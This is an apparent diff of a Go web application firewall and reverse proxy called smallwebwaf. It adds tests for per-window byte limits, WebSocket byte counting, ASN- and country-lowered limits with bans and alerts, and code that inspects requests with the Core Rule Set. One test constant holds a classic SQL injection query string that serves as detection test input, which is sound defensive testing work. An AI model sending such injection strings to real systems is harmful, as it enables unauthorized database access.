wantLine(t, line, http.StatusForbidden, requestlog.ActionRateLimited)
wantPercent(t, "limit_percent", line.LimitPercent, line.LimitPercentSetting,
"0 from "+unknownLimitPercent)
})
}
func TestRequestWaitsForItsLookupWhileABiasedThresholdIsSet(t *testing.T) {
t.Parallel()
const timeout = 3 * time.Second
for _, tc := range []struct {
setting, value string
waits bool
}{
{asnLimitPercent, asnDEHalf, true},
{countryLimitPercent, countryDEHalf, true},
{asnBytesPercent, asnDEHalf, true},
{countryBytesPercent, countryDEHalf, true},
{unknownLimitPercent, "99", true},
{asnLimitPercentURL, asnURL, true},
// At 100, its default, it lowers no limit.
{unknownLimitPercent, "100", false},
} {
t.Run(tc.setting+"="+tc.value, func(t *testing.T) {
t.Parallel()
// In a synctest bubble, as TestRequestWaitsAsLongAsTheLookupTimeoutSays
// says, with a GeoJS that never answers.
synctest.Test(t, func(t *testing.T) {
// The request's body is over SWWAF_REQUEST_MAX_BYTES, so that it
// is refused after the checks, and never reaches the app.
server, out, _ := newProxy(t, "http://app.invalid", unansweredGeoJSURL,
time.Now, map[string]string{
lookupTimeout: timeout.String(), requestMaxBytes: "1",
tc.setting: tc.value,
})
began := time.Now()
serveFromDE(t, server, http.MethodPost, strings.NewReader("ab"))
want := time.Duration(0)
if tc.waits {
want = timeout
}
if waited := time.Since(began); waited != want {
t.Errorf("the request waited %s for its answer, want %s", waited, want)
}
wantLine(t, out.requestLine(t), http.StatusRequestEntityTooLarge,
requestlog.ActionTooLarge)
// The bubble's clock stops once this function returns, so the
// request to GeoJS, which a request that did not wait leaves
// under way, has to be abandoned before then.
time.Sleep(timeout)
})
})
}
}
func TestBanForALoweredLimitGivesThePercentageInItsNotesAndItsAlert(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
env map[string]string
// before is how many uploads come before the one that breaks a
// limit, which is answered with status and logged with action.
before int
status int
action string
// reason and want are the ban's reason, and its notes' limit
// percentage, as percentText gives it.
reason, want string
}{
{
// A quarter of 12 requests a minute is 3: the fourth breaks it.
"a rate limit",
map[string]string{rateLimitPerMinute: "12", asnLimitPercent: asnDEQuarter},
3, http.StatusForbidden, requestlog.ActionRateLimited,
"requests per minute over the limit of 3", "25 from " + asnLimitPercent,
},
{
// The byte limits' percentage, not the rate limits'.
"a byte limit",
map[string]string{
bytesLimitPerMinute: twoUploads, asnLimitPercent: asnDEQuarter,
asnBytesPercent: asnDEHalf,
},
0, http.StatusOK, requestlog.ActionForward,
"bytes per minute over the limit of 99", "50 from " + asnBytesPercent,
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
s, server, queue := startWithLookups(t, tc.env)
for range tc.before {
s.uploadFrom(fromDE)
}
s.requestWithBody(http.MethodPost, fromDE, "/", uploadHeader, uploadBody,
tc.status, tc.action)
held := server.Ledger.Bans(netip.MustParsePrefix(fromDE + "/32"))
if len(held) != 1 {
t.Fatalf("bans %+v, want one", held)
}
notes := held[0].Notes
if held[0].Reason != tc.reason {
t.Errorf("the ban's reason is %q, want %q", held[0].Reason, tc.reason)
}
wantPercent(t, "the notes' limit_percent", notes.LimitPercent,
notes.LimitPercentSetting, tc.want)
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 1 {
t.Fatalf("%d alerts wait, want the ban's alone: %+v", len(waiting), waiting)
}
alerted, _ := waiting[0].Detail["notes"].(bans.Notes)
wantPercent(t, "the alert's notes' limit_percent", alerted.LimitPercent,
alerted.LimitPercentSetting, tc.want)
})
}
}
// startWithLookups is startWithLookupsAndClock for a test that needs no
// clock.
func startWithLookups(
t *testing.T, env map[string]string,
) (*sender, *proxy.Server, *alerts.Queue) {
t.Helper()
s, _, server, queue := startWithLookupsAndClock(t, env)
return s, server, queue
}
// startWithLookupsAndClock is startAppWithAlerts in front of
// readAndAnswer, with the settings in env on top of clients looked up in a
// lookup database, which places fromDE and fromKP in the AS numbers and
// countries the stand-in for GeoJS gives them, noCountry in AS64500 and no
// country, and no other address.
func startWithLookupsAndClock(
t *testing.T, env map[string]string,
) (*sender, *clock, *proxy.Server, *alerts.Queue) {
t.Helper()
path := filepath.Join(t.TempDir(), "ipinfo_lite.mmdb")
lookuptest.Write(t, path, map[string]lookuptest.Network{
fromDE + "/32": {ASN: asnDE, ASName: asNameDE, Country: "DE"},
fromKP + "/32": {ASN: asnKP, ASName: asNameKP, Country: "KP"},
noCountry + "/32": {ASN: "AS64500", ASName: "Nowhere Net"},
})
settings := map[string]string{lookupSource: fileSource, lookupDBPath: path}
maps.Copy(settings, env)
return startAppWithAlerts(t, readAndAnswer, settings)
}
// uploadFrom is upload from the client at from.
func (s *sender) uploadFrom(from string) logLine {
s.t.Helper()
line, _ := s.requestWithBody(http.MethodPost, from, "/", uploadHeader, uploadBody,
http.StatusOK, requestlog.ActionForward)
return line
}
// serveFromDE hands a request from fromDE with method and body straight to
// server's handler, without the network, and returns once it is answered.
func serveFromDE(t *testing.T, server *proxy.Server, method string, body io.Reader) {
t.Helper()
req := httptest.NewRequestWithContext(t.Context(), method, "/", body)
req.RemoteAddr = net.JoinHostPort(fromDE, "1234")
server.Handler.ServeHTTP(httptest.NewRecorder(), req)
}
// wantPercent checks a limit percentage that a log line or a ban's notes
// give, what, and the setting that gave it, against want, as percentText
// gives them.
func wantPercent(t *testing.T, what string, percent *int64, setting, want string) {
t.Helper()
if got := percentText(percent, setting); got != want {
t.Errorf("%s is %s, want %s", what, got, want)
}
}
// percentText gives a limit percentage and the setting that gave it as
// text, such as "50 from SWWAF_ASN_LIMIT_PERCENT", or none when both are
// left out.
func percentText(percent *int64, setting string) string {
switch {
case percent == nil && setting == "":
return none
case percent == nil:
return "none from " + setting
default:
return fmt.Sprintf("%d from %s", *percent, setting)
}
}
+54 -1
View File
@@ -21,6 +21,9 @@ type requestBody struct {
// SWWAF_REQUEST_MAX_BYTES. // SWWAF_REQUEST_MAX_BYTES.
body io.ReadCloser body io.ReadCloser
rq *request rq *request
// readByCoreRuleSet is what the Core Rule Set read of the body before
// the request went to the app, and Read gives first.
readByCoreRuleSet []byte
// waiting is true while a Read waits for the client to send more. // waiting is true while a Read waits for the client to send more.
waiting atomic.Bool waiting atomic.Bool
// received is true once the client has sent the whole body. // received is true once the client has sent the whole body.
@@ -29,8 +32,16 @@ type requestBody struct {
bytes atomic.Int64 bytes atomic.Int64
} }
// Read reads from the client's body. // Read reads from the client's body, after what the Core Rule Set read of
// it, which has been counted already.
func (b *requestBody) Read(p []byte) (int, error) { func (b *requestBody) Read(p []byte) (int, error) {
if len(b.readByCoreRuleSet) > 0 {
n := copy(p, b.readByCoreRuleSet)
b.readByCoreRuleSet = b.readByCoreRuleSet[n:]
return n, nil
}
b.waiting.Store(true) b.waiting.Store(true)
n, err := b.body.Read(p) n, err := b.body.Read(p)
b.waiting.Store(false) b.waiting.Store(false)
@@ -103,6 +114,48 @@ func (b *responseBody) Close() error {
return b.body.Close() return b.body.Close()
} }
// upgradedConn is the connection to the app once the app has switched
// protocols, as for a WebSocket. ReverseProxy writes to it what the client
// sends and reads from it what the app sends, on goroutines of its own,
// until the connection closes; it counts the bytes each way, for the byte
// limits.
type upgradedConn struct {
io.ReadWriteCloser
// fromApp is how many bytes the app has sent, and toApp how many the
// client has.
fromApp atomic.Int64
toApp atomic.Int64
}
// Read reads what the app sends.
func (c *upgradedConn) Read(p []byte) (int, error) {
n, err := c.ReadWriteCloser.Read(p)
c.fromApp.Add(int64(n))
return n, err
}
// Write sends the app what the client sent.
func (c *upgradedConn) Write(p []byte) (int, error) {
n, err := c.ReadWriteCloser.Write(p)
c.toApp.Add(int64(n))
return n, err
}
// CloseWrite tells the app that the client sends no more, while what the
// app sends still passes. ReverseProxy calls it once the client has
// stopped sending, and closes the connection there if it is not supported.
func (c *upgradedConn) CloseWrite() error {
conn, ok := c.ReadWriteCloser.(interface{ CloseWrite() error })
if !ok {
return http.ErrNotSupported
}
return conn.CloseWrite()
}
// limitBody returns body, cut off with an *http.MaxBytesError after // limitBody returns body, cut off with an *http.MaxBytesError after
// maxBytes, or unchanged if maxBytes is zero, which is off. // maxBytes, or unchanged if maxBytes is zero, which is off.
func limitBody(body io.ReadCloser, maxBytes int64) io.ReadCloser { func limitBody(body io.ReadCloser, maxBytes int64) io.ReadCloser {
+582
View File
@@ -0,0 +1,582 @@
package proxy_test
import (
"bufio"
"io"
"net"
"net/http"
"net/netip"
"reflect"
"strconv"
"strings"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// The byte limit settings.
const (
bytesLimitPerMinute = "SWWAF_BYTES_LIMIT_PER_MINUTE"
bytesLimitPerHour = "SWWAF_BYTES_LIMIT_PER_HOUR"
bytesLimitPerDay = "SWWAF_BYTES_LIMIT_PER_DAY"
bytesCount = "SWWAF_BYTES_COUNT"
)
// The values of SWWAF_BYTES_COUNT.
const (
countResponse = "response"
countRequest = "request"
countBoth = "both"
)
const (
// bodyBytes is the size of the body of each request these tests send
// with one, and answerBytes that of each answer of the app.
bodyBytes = 30
answerBytes = 70
// byteLimit is the byte limit these tests set, as a setting: a request
// with a body and its answer, 100 bytes, go over it.
byteLimit = "99"
// minuteBytes is limit_hit for SWWAF_BYTES_LIMIT_PER_MINUTE.
minuteBytes = "minute_bytes"
)
func TestEachByteLimitBansOnceTheResponseHasEnded(t *testing.T) {
t.Parallel()
const scraper = "192.0.2.200"
for _, tc := range []struct {
setting, window string
// apart is the time between the two requests, which the window
// still covers.
apart time.Duration
}{
{bytesLimitPerMinute, minute, 0},
{bytesLimitPerHour, "hour", 2 * time.Minute},
{bytesLimitPerDay, "day", 2 * time.Hour},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, clk := startWithAnswers(t, map[string]string{
tc.setting: byteLimit, metricsToken: token,
})
// 70 bytes are within the limit of 99.
line, _ := s.download()
if line.LimitHit != "" || line.Offence != "" {
t.Errorf("log line has limit_hit %q and offence %q, want neither",
line.LimitHit, line.Offence)
}
// 140 bytes are over it. The response is passed on whole, and
// then bans the client for an hour.
clk.advance(tc.apart)
expires := requestlog.FormatTime(clk.Now().Add(time.Hour))
line, got := s.download()
if got.err != nil || len(got.body) != answerBytes ||
line.ResponseBytes != answerBytes {
t.Errorf("got %d bytes (%v), and the log line has response_bytes %d, "+
"want %d", len(got.body), got.err, line.ResponseBytes, answerBytes)
}
if line.LimitHit != tc.window+"_bytes" || line.Offence != requestlog.OffenceLimit ||
line.BanExpires != expires {
t.Errorf("log line has limit_hit %q, offence %q and ban_expires %q, "+
"want %s_bytes, limit and %s", line.LimitHit, line.Offence,
line.BanExpires, tc.window, expires)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
wantMetric(t, s.scrape(scraper), `smallwebwaf_rate_limit_hits_total{`+
`instance="`+alertInstance+`",kind="bytes",window="`+tc.window+`"}`, 1)
})
}
}
func TestResponseOverAByteLimitByItselfIsPassedOnWhole(t *testing.T) {
t.Parallel()
s, _ := startWithAnswers(t, map[string]string{bytesLimitPerMinute: "50"})
// The answer's 70 bytes are over the limit of 50 on their own.
line, got := s.download()
if got.err != nil || len(got.body) != answerBytes || line.LimitHit != minuteBytes {
t.Errorf("got %d bytes (%v), and the log line has limit_hit %q, want %d and %s",
len(got.body), got.err, line.LimitHit, answerBytes, minuteBytes)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
}
func TestBytesOfAnAnswerThatBreaksOffAreCounted(t *testing.T) {
t.Parallel()
s, clk, _, _ := startAppWithAlerts(t, breakOff, map[string]string{
bytesLimitPerMinute: "50",
})
expires := requestlog.FormatTime(clk.Now().Add(time.Hour))
// The 70 bytes passed on before the app broke off are over the limit of
// 50, and ban the client for an hour.
line, got := s.requestWithBody(http.MethodGet, client, "/", "", "", http.StatusOK,
requestlog.ActionUpstreamError)
if len(got.body) != answerBytes || line.LimitHit != minuteBytes ||
line.BanExpires != expires {
t.Errorf("got %d bytes, and the log line has limit_hit %q and ban_expires %q, "+
"want %d, %s and %s", len(got.body), line.LimitHit, line.BanExpires,
answerBytes, minuteBytes, expires)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
}
func TestWebSocketBytesAreCountedOnceItCloses(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
setting string
counted float64
}{
{countResponse, answerBytes},
{countRequest, bodyBytes},
{countBoth, bodyBytes + answerBytes},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, _, _, _ := startAppWithAlerts(t, answerAfterUpgrade, map[string]string{
bytesLimitPerMinute: "29", bytesCount: tc.setting,
})
// The client sends 30 bytes and the app 70, each over the limit
// of 29, which bans the client once the WebSocket has closed.
line := s.webSocket()
if line.LimitHit != minuteBytes || line.Counts.MinuteBytes != tc.counted {
t.Errorf("log line has limit_hit %q and minute_bytes %v, want %s and %v",
line.LimitHit, line.Counts.MinuteBytes, minuteBytes, tc.counted)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
})
}
}
func TestWebSocketPassesTheAnswerAfterTheClientStopsSending(t *testing.T) {
t.Parallel()
app := startApp(t, echoOnceTheClientStops)
addr, out := startProxy(t, app.URL,
map[string]string{trustedProxies: trustLocalhost})
s := &sender{t: t, addr: addr, out: out}
conn, reader := s.openWebSocket()
send(t, conn, uploadBody)
// The client closes its sending side and waits for the answer, which the
// app sends only once it has seen the client stop. smallwebwaf passes the
// close on to the app through CloseWrite on upgradedConn; without that,
// it closes both connections, and the answer is lost.
tcp, ok := conn.(*net.TCPConn)
if !ok {
t.Fatalf("connection is a %T, want a *net.TCPConn", conn)
}
err := tcp.CloseWrite()
if err != nil {
t.Fatalf("close the sending side: %v", err)
}
got, err := io.ReadAll(reader)
if err != nil || string(got) != uploadBody {
t.Errorf("got %q (%v), want %q", got, err, uploadBody)
}
s.closeWebSocket(conn)
}
func TestBytesCountSaysWhichBytesCount(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
setting string
// each is the bytes each request counts, and breaking the request
// that goes over the limit of 99.
each float64
breaking int
}{
{countResponse, answerBytes, 2},
{countRequest, bodyBytes, 4},
{countBoth, bodyBytes + answerBytes, 1},
} {
t.Run(tc.setting, func(t *testing.T) {
t.Parallel()
s, _ := startWithAnswers(t, map[string]string{
bytesLimitPerMinute: byteLimit, bytesCount: tc.setting,
})
for i := 1; i <= tc.breaking; i++ {
line := s.upload()
want := ""
if i == tc.breaking {
want = minuteBytes
}
counted := float64(i) * tc.each
if line.LimitHit != want || line.Counts.MinuteBytes != counted {
t.Errorf("request %d: log line has limit_hit %q and minute_bytes %v, "+
"want %q and %v", i, line.LimitHit, line.Counts.MinuteBytes,
want, counted)
}
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
})
}
}
func TestByteLimitsLeaveOutWhatTheRateLimitsLeaveOut(t *testing.T) {
t.Parallel()
const (
allowed = "192.0.2.7" // in SWWAF_ALLOW_NETS
exempt = "192.0.2.10" // in SWWAF_RATE_LIMIT_EXEMPT_NETS
)
s, _ := startWithAnswers(t, map[string]string{
bytesLimitPerMinute: byteLimit,
allowNets: allowed,
rateLimitExemptNets: exempt,
rateLimitExemptPaths: "/assets/",
})
// Each sends 200 bytes, none of which is counted.
for _, sent := range []struct{ from, path string }{
{allowed, "/"}, {exempt, "/"}, {client, "/assets/app.js"},
} {
for range 2 {
line, _ := s.requestWithBody(http.MethodPost, sent.from, sent.path,
uploadHeader, uploadBody, http.StatusOK, requestlog.ActionForward)
if _, counted := line.fields["counts"]; counted || line.LimitHit != "" {
t.Errorf("%s %s: log line has counts %v and limit_hit %q, want neither",
sent.from, sent.path, line.fields["counts"], line.LimitHit)
}
}
}
// A path that is not exempt is counted, and breaks the limit.
line := s.upload()
if line.LimitHit != minuteBytes {
t.Errorf("log line has limit_hit %q, want %s", line.LimitHit, minuteBytes)
}
}
func TestByteLimitsOffCountTheBytesAndBanNoOne(t *testing.T) {
t.Parallel()
s, _ := startWithAnswers(t, map[string]string{
bytesLimitPerMinute: off, bytesLimitPerHour: off, bytesLimitPerDay: off,
})
for i := 1; i <= 3; i++ {
line := s.upload()
counted := float64(i * (bodyBytes + answerBytes))
if line.LimitHit != "" || line.Counts.MinuteBytes != counted ||
line.Counts.HourBytes != counted || line.Counts.DayBytes != counted {
t.Errorf("request %d: log line has limit_hit %q and counts %+v, "+
"want none and %v bytes in each window", i, line.LimitHit,
line.Counts, counted)
}
}
}
func TestBanForABrokenByteLimitHasItsNotesAndItsAlert(t *testing.T) {
t.Parallel()
s, clk, server, queue := startAppWithAlerts(t, readAndAnswer, map[string]string{
bytesLimitPerMinute: byteLimit,
})
start := clk.Now()
s.requestWithBody(http.MethodPost, client, "/upload?part=1", uploadHeader,
uploadBody, http.StatusOK, requestlog.ActionForward)
netblock := netip.MustParsePrefix(client + "/32")
want := bans.Ban{
Netblock: netblock,
Start: start,
Expires: start.Add(time.Hour),
Cause: bans.CauseLimit,
Reason: "bytes per minute over the limit of " + byteLimit,
Notes: bans.Notes{
Kind: "bytes",
Limit: 99,
Window: minute,
Count: bodyBytes + answerBytes,
// The request as it was answered, by the app.
Request: bans.Request{
Time: start,
Method: http.MethodPost,
Host: appHost,
Path: "/upload?part=1",
Status: http.StatusOK,
UserAgent: userAgent,
},
Requests: 1,
},
}
got := server.Ledger.Bans(netblock)
if len(got) != 1 || !reflect.DeepEqual(got[0], want) {
t.Fatalf("bans\n%+v\nwant\n%+v", got, want)
}
wantAlerts(t, queue, banAlert(alerts.EventBan, start, client, want,
requestlog.FormatTime(want.Expires)))
if offences := historyOf(t, server, client).Offences.Limit; offences != 1 {
t.Errorf("history counts %d offences for a limit, want 1", offences)
}
}
func TestObserveModeLogsAndAlertsAByteLimitAndBansNoOne(t *testing.T) {
t.Parallel()
s, clk, server, queue := startAppWithAlerts(t, readAndAnswer, map[string]string{
mode: observe,
bytesLimitPerMinute: byteLimit,
})
start := clk.Now()
// No ban sets the client's counters back to zero, so each request
// breaks the limit again. The answer is the app's either way, and the
// alert for the ban is not sent twice within the cooldown.
for range 2 {
line := s.upload()
wantWouldAction(t, line, "")
if line.LimitHit != minuteBytes || line.Offence != requestlog.OffenceLimit ||
line.BanExpires != "" {
t.Errorf("log line has limit_hit %q, offence %q and ban_expires %q, "+
"want %s, limit and none", line.LimitHit, line.Offence, line.BanExpires,
minuteBytes)
}
}
if held := server.Ledger.Snapshot(); len(held) != 0 {
t.Errorf("the ledger holds %+v, want no ban", held)
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 1 {
t.Fatalf("%d alerts wait, want 1: %+v", len(waiting), waiting)
}
notes, _ := waiting[0].Detail["notes"].(bans.Notes)
alert := banAlert(alerts.EventBan, start, client, bans.Ban{
Netblock: netip.MustParsePrefix(client + "/32"), Cause: bans.CauseLimit,
Reason: "bytes per minute over the limit of " + byteLimit, Notes: notes,
}, requestlog.FormatTime(start.Add(time.Hour)))
alert.Detail["mode"] = observe
wantAlerts(t, queue, alert)
}
func TestObserveModeLeavesOutTheBytesOfARequestEnforceModeRefuses(t *testing.T) {
t.Parallel()
s, _ := startWithAnswers(t, map[string]string{
mode: observe,
rateLimitPerMinute: "1",
bytesLimitPerMinute: "150",
})
s.upload()
// The second request breaks the rate limit, which in enforce mode would
// refuse it before the app sent anything, so its 100 bytes are not
// counted, and the byte limit is not broken. Its line gives the bytes
// counted before it.
line := s.upload()
wantWouldAction(t, line, requestlog.ActionRateLimited)
if line.LimitHit != minute || line.Counts.MinuteBytes != bodyBytes+answerBytes {
t.Errorf("log line has limit_hit %q and minute_bytes %v, want minute and %d",
line.LimitHit, line.Counts.MinuteBytes, bodyBytes+answerBytes)
}
}
// uploadHeader and uploadBody are the header and the body of a request
// with a body of bodyBytes.
//
//nolint:gochecknoglobals // a constant cannot call strings.Repeat
var (
uploadHeader = "Content-Length: " + strconv.Itoa(bodyBytes)
uploadBody = strings.Repeat("u", bodyBytes)
)
// readAndAnswer is the app of these tests: it reads each request's whole
// body and answers with answerBytes bytes.
func readAndAnswer(w http.ResponseWriter, r *http.Request) {
_, _ = io.Copy(io.Discard, r.Body)
_, _ = io.WriteString(w, strings.Repeat("a", answerBytes))
}
// breakOff is an app that announces an answer of twice answerBytes, and
// breaks off after answerBytes.
func breakOff(w http.ResponseWriter, _ *http.Request) {
w.Header().Set("Content-Length", strconv.Itoa(2*answerBytes))
_, _ = io.WriteString(w, strings.Repeat("a", answerBytes))
}
// answerAfterUpgrade is an app that switches protocols, as for a
// WebSocket, and then answers each line it receives with a line of
// answerBytes.
func answerAfterUpgrade(w http.ResponseWriter, _ *http.Request) {
conn, buffered, err := http.NewResponseController(w).Hijack()
if err != nil {
return
}
defer func() {
_ = conn.Close()
}()
_, _ = buffered.WriteString("HTTP/1.1 101 Switching Protocols\r\n" +
"Connection: Upgrade\r\nUpgrade: websocket\r\n\r\n")
_ = buffered.Flush()
for {
_, err := buffered.ReadString('\n')
if err != nil {
return
}
_, _ = buffered.WriteString(strings.Repeat("a", answerBytes-1) + "\n")
_ = buffered.Flush()
}
}
// echoOnceTheClientStops is an app that switches protocols, as for a
// WebSocket, reads what the client sends until the client stops sending,
// and then sends it all back.
func echoOnceTheClientStops(w http.ResponseWriter, _ *http.Request) {
conn, buffered, err := http.NewResponseController(w).Hijack()
if err != nil {
return
}
defer func() {
_ = conn.Close()
}()
_, _ = buffered.WriteString("HTTP/1.1 101 Switching Protocols\r\n" +
"Connection: Upgrade\r\nUpgrade: websocket\r\n\r\n")
_ = buffered.Flush()
received, _ := io.ReadAll(buffered)
_, _ = buffered.Write(received)
_ = buffered.Flush()
}
// webSocket opens a WebSocket from client to answerAfterUpgrade, sends a
// line of bodyBytes on it, reads the answer, and closes it. It checks the
// answer, and the log line as request does, and returns the log line.
func (s *sender) webSocket() logLine {
s.t.Helper()
conn, reader := s.openWebSocket()
send(s.t, conn, strings.Repeat("u", bodyBytes-1)+"\n")
got, err := reader.ReadString('\n')
if err != nil || len(got) != answerBytes {
s.t.Errorf("got %d bytes (%v), want %d", len(got), err, answerBytes)
}
return s.closeWebSocket(conn)
}
// openWebSocket sends a request from client to switch protocols, as for a
// WebSocket, and checks that the app switches. It returns the connection,
// on which reading fails once waitLimit has passed, and a reader of what
// the app sends on it.
func (s *sender) openWebSocket() (net.Conn, *bufio.Reader) {
s.t.Helper()
conn := dial(s.t, s.addr)
send(s.t, conn, "GET /socket HTTP/1.1\r\nHost: "+appHost+"\r\n"+forwardedFor+
": "+client+"\r\nConnection: Upgrade\r\nUpgrade: websocket\r\n\r\n")
err := conn.SetReadDeadline(time.Now().Add(waitLimit))
if err != nil {
s.t.Fatalf("set read deadline: %v", err)
}
reader := bufio.NewReader(conn)
res, err := http.ReadResponse(reader, nil)
if err != nil {
s.t.Fatalf("read the answer to the upgrade: %v", err)
}
_ = res.Body.Close()
if res.StatusCode != http.StatusSwitchingProtocols {
s.t.Fatalf("status %d, want %d", res.StatusCode, http.StatusSwitchingProtocols)
}
return conn, reader
}
// closeWebSocket closes conn, a WebSocket openWebSocket opened, checks its
// log line as request does, and returns it.
func (s *sender) closeWebSocket(conn net.Conn) logLine {
s.t.Helper()
_ = conn.Close()
line := s.out.requestLines(s.t, s.sent+1)[s.sent]
s.sent++
wantLine(s.t, line, http.StatusSwitchingProtocols, requestlog.ActionForward)
return line
}
// startWithAnswers is startAppWithAlerts in front of readAndAnswer, for a
// test that looks at neither the server nor the alerts.
func startWithAnswers(t *testing.T, env map[string]string) (*sender, *clock) {
t.Helper()
s, clk, _, _ := startAppWithAlerts(t, readAndAnswer, env)
return s, clk
}
// download sends a GET request for / from client, and checks that the
// app's answer is passed on, as request does. It returns the log line and
// the answer.
func (s *sender) download() (logLine, answer) {
s.t.Helper()
return s.requestWithBody(http.MethodGet, client, "/", "", "", http.StatusOK,
requestlog.ActionForward)
}
// upload is download for a POST request with a body of bodyBytes, and
// returns the log line.
func (s *sender) upload() logLine {
s.t.Helper()
line, _ := s.requestWithBody(http.MethodPost, client, "/", uploadHeader,
uploadBody, http.StatusOK, requestlog.ActionForward)
return line
}
+5 -7
View File
@@ -76,16 +76,14 @@ func scheme(r *http.Request, peerTrusted bool) string {
return proto return proto
} }
// ipv6GroupPrefix is the length of the IPv6 netblock that is one client.
const ipv6GroupPrefix = 64
// clientGroup is the client a request is counted toward: its IPv4 // clientGroup is the client a request is counted toward: its IPv4
// address, or the /64 its IPv6 address is in, since one abuser usually // address, or its IPv6 group, the netblock its IPv6 address is in of the
// holds a whole /64. An IPv4 address in IPv6 form counts as IPv4. // length SWWAF_IPV6_GROUP_PREFIX sets, a /64 by default, since one abuser
func clientGroup(addr netip.Addr) netip.Prefix { // usually holds a whole /64. An IPv4 address in IPv6 form counts as IPv4.
func (h *handler) clientGroup(addr netip.Addr) netip.Prefix {
addr = addr.Unmap() addr = addr.Unmap()
if addr.Is6() { if addr.Is6() {
return netip.PrefixFrom(addr, ipv6GroupPrefix).Masked() return netip.PrefixFrom(addr, h.config.IPv6GroupPrefix).Masked()
} }
return netip.PrefixFrom(addr, addr.BitLen()) return netip.PrefixFrom(addr, addr.BitLen())
+124
View File
@@ -0,0 +1,124 @@
package proxy
import (
"errors"
"net/http"
"os"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/config"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
"sneak.berlin/go/smallwebwaf/internal/waf"
)
// checkCoreRuleSet inspects the request with the Core Rule Set, unless
// SWWAF_WAF_MODE is off or SWWAF_WAF_EXEMPT_PATHS exempts its path, as
// pathExempt decides, and notes the rules it matched and its score in the
// log line, and the rules in the metrics. A score at or over
// SWWAF_WAF_ANOMALY_THRESHOLD is a match: it raises the waf_block alert,
// and in block mode refuses the request, which is an offence its client's
// history counts, and so returns ActionWAFBlocked. It returns "" for a
// request it does not refuse, and for one whose body meets a size or time
// limit while the Core Rule Set reads it, which it notes nothing of.
func (rq *request) checkCoreRuleSet() string {
cfg := rq.h.config
if cfg.WAFMode == config.WAFModeOff || pathExempt(rq.in.URL, cfg.WAFExemptPaths) {
return ""
}
start := time.Now()
result := rq.inspect()
if rq.refused.Load() != nil {
return "" // the refusal for that limit, which check returns
}
rq.line.DurationWAF = new(requestlog.Milliseconds(time.Since(start)))
rq.line.WAFRuleIDs = result.RuleIDs
rq.line.WAFScore = &result.Score
for _, id := range result.RuleIDs {
rq.h.metrics.WAFMatched(cfg.WAFMode, id)
}
threshold := cfg.WAFAnomalyThreshold
if threshold == 0 || result.Score < threshold {
return ""
}
rq.alertWAFBlock(result)
if cfg.WAFMode == config.WAFModeDetect {
return ""
}
rq.wafBlocked = true
return requestlog.ActionWAFBlocked
}
// inspect runs the Core Rule Set on the request, which reads the part of
// its body it inspects within SWWAF_CLIENT_REQUEST_TIMEOUT, and keeps that
// part for the app. A client that runs out of time is refused with 408
// here, and a body over SWWAF_REQUEST_MAX_BYTES with 413 as it is read;
// check returns the refusal. A body that breaks off for any other reason
// is passed on as far as it came, and the request to the app fails there,
// as it would have without the Core Rule Set.
func (rq *request) inspect() waf.Result {
if rq.body == nil {
// Nothing is read of no body, so nothing can go wrong reading it.
result, _, _ := rq.h.coreRuleSet.Inspect(rq.in, rq.client, http.NoBody)
return result
}
_ = rq.rc.SetReadDeadline(rq.clientRequestDeadline())
result, read, err := rq.h.coreRuleSet.Inspect(rq.in, rq.client, rq.body)
// The timeouts that run while the request goes to the app take over.
_ = rq.rc.SetReadDeadline(time.Time{})
rq.body.readByCoreRuleSet = read
if errors.Is(err, os.ErrDeadlineExceeded) {
rq.refuse(refusal{
status: http.StatusRequestTimeout,
action: requestlog.ActionTimedOut,
limit: "SWWAF_CLIENT_REQUEST_TIMEOUT",
})
}
return result
}
// alertWAFBlock raises the waf_block alert for the request, which the Core
// Rule Set scored at result, at or over SWWAF_WAF_ANOMALY_THRESHOLD. Its
// detail gives the rule ids, the score, the method and the path with the
// query, and, for a request that is not refused for it, the mode: detect,
// or observe in observe mode.
func (rq *request) alertWAFBlock(result waf.Result) {
detail := map[string]any{
"rule_ids": result.RuleIDs,
"score": result.Score,
"method": rq.in.Method,
"path": rq.in.URL.RequestURI(),
}
switch {
case rq.h.config.WAFMode == config.WAFModeDetect:
detail["mode"] = config.WAFModeDetect
case rq.h.config.Observe:
detail["mode"] = "observe"
}
rq.h.alerts.Raise(alerts.Alert{
Event: alerts.EventWAFBlock,
Client: rq.client,
Netblock: rq.h.clientGroup(rq.client),
ASN: rq.line.ASN,
ASName: rq.line.ASName,
Country: rq.line.Country,
Reason: "scored by the Core Rule Set at or over SWWAF_WAF_ANOMALY_THRESHOLD",
Detail: detail,
})
}
+590
View File
@@ -0,0 +1,590 @@
package proxy_test
import (
"io"
"net/http"
"net/netip"
"slices"
"strconv"
"strings"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// The Core Rule Set's settings the tests set, besides SWWAF_WAF_MODE, and
// its two modes that inspect requests.
const (
wafAnomalyThreshold = "SWWAF_WAF_ANOMALY_THRESHOLD"
wafDisabledRules = "SWWAF_WAF_DISABLED_RULES"
wafExemptPaths = "SWWAF_WAF_EXEMPT_PATHS"
wafBodyLimit = "SWWAF_WAF_BODY_LIMIT"
block = "block"
detect = "detect"
)
// formData is the type of a form's body.
const formData = "application/x-www-form-urlencoded"
// sqlInjection asks for / with an SQL injection in its query, which only
// the Core Rule Set's rule 942100 matches, with a score of 5, the default
// SWWAF_WAF_ANOMALY_THRESHOLD.
const sqlInjection = "/?id=1'%20OR%20'1'='1"
